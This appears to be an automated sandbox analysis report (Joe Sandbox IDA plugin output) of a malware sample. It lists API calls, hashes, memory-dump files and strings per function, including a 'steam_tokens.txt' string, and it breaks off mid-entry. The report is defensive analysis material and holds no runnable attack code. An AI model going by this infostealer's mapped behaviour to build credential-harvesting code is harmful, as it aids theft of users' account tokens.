                          • Instruction ID: dc16effb4c7730068131de418c94800a4a009af07149a39b0421c294d3bdb12b
                          • Opcode Fuzzy Hash: a02b5404cc9f5ec33b6af621f8a2318548fe45cff370bdd430c08f4c6b4f6095
                          • Instruction Fuzzy Hash: A841D571A00A2A9BCB20EF65FC426EE77B6BF90344F045568EC1597352DA30ED05CFA0
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0063EA24
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063EA53
                          • lstrcat.KERNEL32(?,00000000), ref: 0063EA61
                          • lstrcat.KERNEL32(?,00651794), ref: 0063EA7A
                          • lstrcat.KERNEL32(?,01298BB0), ref: 0063EA8D
                          • lstrcat.KERNEL32(?,00651794), ref: 0063EA9F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: 295e68b97b736eac046990b8a6ee6dd1d1860146d84c336784b92e9340983db9
                          • Instruction ID: b21286fc6b206848017cf0ad5a3b464be616c6cf7b76f147516ab452c2d78f47
                          • Opcode Fuzzy Hash: 295e68b97b736eac046990b8a6ee6dd1d1860146d84c336784b92e9340983db9
                          • Instruction Fuzzy Hash: 2041AB71910619EBC795EB64EC52FED7376FF48301F004598FA1697280DE749E848F94
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063ECDF
                          • lstrlen.KERNEL32(00000000), ref: 0063ECF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063ED1D
                          • lstrlen.KERNEL32(00000000), ref: 0063ED24
                          • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0063ED52
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: steam_tokens.txt
                          • API String ID: 367037083-401951677
                          • Opcode ID: a2fa480c52fed7a0622b0cc3ef6df4561a17f2462ef3346a18d27780a3fa410a
                          • Instruction ID: 75c58f47634aa848f86545058ebc26b3226d6dab41db38123bf438dd84deab4a
                          • Opcode Fuzzy Hash: a2fa480c52fed7a0622b0cc3ef6df4561a17f2462ef3346a18d27780a3fa410a
                          • Instruction Fuzzy Hash: 3531F571A109266BC761BB39FC1B99E77A7AF40301F041128F846DBB52DF24DC068BD8
                          APIs
                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0062140E), ref: 00629A9A
                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0062140E), ref: 00629AB0
                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,0062140E), ref: 00629AC7
                          • ReadFile.KERNEL32(00000000,00000000,?,0062140E,00000000,?,?,?,0062140E), ref: 00629AE0
                          • LocalFree.KERNEL32(?,?,?,?,0062140E), ref: 00629B00
                          • CloseHandle.KERNEL32(00000000,?,?,?,0062140E), ref: 00629B07
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: d4fee298843e57f01fa3194cb9889c29df931d3c4cf17808a4621938624742e2
                          • Instruction ID: 8570939b5f9b9a8ed31ac3fe6f066dbefeb6631913918b6d28905e5b8df86a1c
                          • Opcode Fuzzy Hash: d4fee298843e57f01fa3194cb9889c29df931d3c4cf17808a4621938624742e2
                          • Instruction Fuzzy Hash: 91114C71600729EFEB10DFA9ED88AAB736DFB44346F100259F901A6280EB749D00CBB0
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00645B14
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A188
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A1AE
                          • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00645B7C
                          • memmove.MSVCRT(00000000,?,?), ref: 00645B89
                          • memmove.MSVCRT(00000000,?,?), ref: 00645B98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long
                          • API String ID: 2052693487-3788999226
                          • Opcode ID: 16bec2eaba057808c1c3798de755747cc4d8b8e7814bf76896ddd0f028731cd7
                          • Instruction ID: b95e65290a48bf4caf0917ba257fb6dc3608a42dc79ca5881805cc72554e3f19
                          • Opcode Fuzzy Hash: 16bec2eaba057808c1c3798de755747cc4d8b8e7814bf76896ddd0f028731cd7
                          • Instruction Fuzzy Hash: 02416071A005199FCF08DF6CC991AAEBBB6EB89710F15826DE909E7745D630DD018B90
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00637D58
                            • Part of subcall function 0064A1C0: std::exception::exception.LIBCMT ref: 0064A1D5
                            • Part of subcall function 0064A1C0: std::exception::exception.LIBCMT ref: 0064A1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 00637D76
                          • std::_Xinvalid_argument.LIBCPMT ref: 00637D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$std::exception::exception
                          • String ID: invalid string position$string too long
                          • API String ID: 3310641104-4289949731
                          • Opcode ID: bc7c8b093621ab508a0be2aa2d957aff722a5707b99c3498af68e709c7d5a12c
                          • Instruction ID: d55a4e978bf0987c70bfcb216f58c9586dc95cf39f07f192465f7a52224fed8c
                          • Opcode Fuzzy Hash: bc7c8b093621ab508a0be2aa2d957aff722a5707b99c3498af68e709c7d5a12c
                          • Instruction Fuzzy Hash: 8221A2723042009BD730DE6CD881A7AF7E7EFA1761F204AAEE4568B741D771D84487E5
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006433EF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 006433F6
                          • GlobalMemoryStatusEx.KERNEL32 ref: 00643411
                          • wsprintfA.USER32 ref: 00643437
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB
                          • API String ID: 2922868504-2651807785
                          • Opcode ID: 1d6fbf47b4340e11c785e74e7731738a15f6dbbcb2f8afeed9c50200a79c214f
                          • Instruction ID: 4f610e17969a6b23bfcba88965991803a1340a9e08b9197df60dce22c10c7724
                          • Opcode Fuzzy Hash: 1d6fbf47b4340e11c785e74e7731738a15f6dbbcb2f8afeed9c50200a79c214f
                          • Instruction Fuzzy Hash: FD01D871A44714EFDB14DF98DD49BAEB7B9FB44711F000529F906E7380D778590086A5
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit$__getptdfree
                          • String ID: Xue$Xue
                          • API String ID: 2640026729-2768520164
                          • Opcode ID: 594b3d72c9cd50bd4251ac17915c9bf914279e80e0323d5d17bb2a6970b9c31d
                          • Instruction ID: 97cb3960334c59087bdec6adbc0dbc16d48566275bcee5bc3f324b5120c947df
                          • Opcode Fuzzy Hash: 594b3d72c9cd50bd4251ac17915c9bf914279e80e0323d5d17bb2a6970b9c31d
                          • Instruction Fuzzy Hash: 8601D232D95B11ABCB61AF28A4497DFB363BF04B11F140118E80067780CBA06E41DBE9
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,0129D148,00000000,00020119,?), ref: 0063D7F5
                          • RegQueryValueExA.ADVAPI32(?,0129D9D8,00000000,00000000,00000000,000000FF), ref: 0063D819
                          • RegCloseKey.ADVAPI32(?), ref: 0063D823
                          • lstrcat.KERNEL32(?,00000000), ref: 0063D848
                          • lstrcat.KERNEL32(?,0129DA08), ref: 0063D85C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValue
                          • String ID:
                          • API String ID: 690832082-0
                          • Opcode ID: f50a23fb2e87fde723cc19db64eb27ffade1a46136120d62531be48c7b6babb5
                          • Instruction ID: d5fe31b5a6b8ce8020d3acf250078086ca00bc331d683c85fb201cf143a9acef
                          • Opcode Fuzzy Hash: f50a23fb2e87fde723cc19db64eb27ffade1a46136120d62531be48c7b6babb5
                          • Instruction Fuzzy Hash: E14191B1A1021CAFCB94EF64FC82BDE7779BF54304F0040A9B509A7251EE34AA858FD5
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00637F31
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00637F60
                          • StrCmpCA.SHLWAPI(00000000,00654C3C), ref: 00637FA5
                          • StrCmpCA.SHLWAPI(00000000,00654C3C), ref: 00637FD3
                          • StrCmpCA.SHLWAPI(00000000,00654C3C), ref: 00638007
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 71f78e2790b0b95bcab3d64e520b49b01b6cea977bb0b51590ea5d9f4d074b71
                          • Instruction ID: b9fe0a1de35db0a2a927eee73ba8e650669e7e86ccb4b1d60de3e49bc5b76900
                          • Opcode Fuzzy Hash: 71f78e2790b0b95bcab3d64e520b49b01b6cea977bb0b51590ea5d9f4d074b71
                          • Instruction Fuzzy Hash: 49417CB0A0421ADFCB20DF68D880EAEB7B6FF54300F11419DE8059B351DB75AA66CBD1
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 006380BB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006380EA
                          • StrCmpCA.SHLWAPI(00000000,00654C3C), ref: 00638102
                          • lstrlen.KERNEL32(00000000), ref: 00638140
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063816F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: aa126113d11a65a7e0253ea225047f04e6a9f8ab7929a0e552573a6a449f9f0c
                          • Instruction ID: f85fc970c9135b0702b6f9e6f1f256a098d15a768bffd104983f8a32c1f601d9
                          • Opcode Fuzzy Hash: aa126113d11a65a7e0253ea225047f04e6a9f8ab7929a0e552573a6a449f9f0c
                          • Instruction Fuzzy Hash: 2A415871A00206AFCB21DF68D984BEABBF6AB44700F15855DB849D7258EF38D946CB90
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00641B72
                            • Part of subcall function 00641820: lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0064184F
                            • Part of subcall function 00641820: lstrlen.KERNEL32(01286188), ref: 00641860
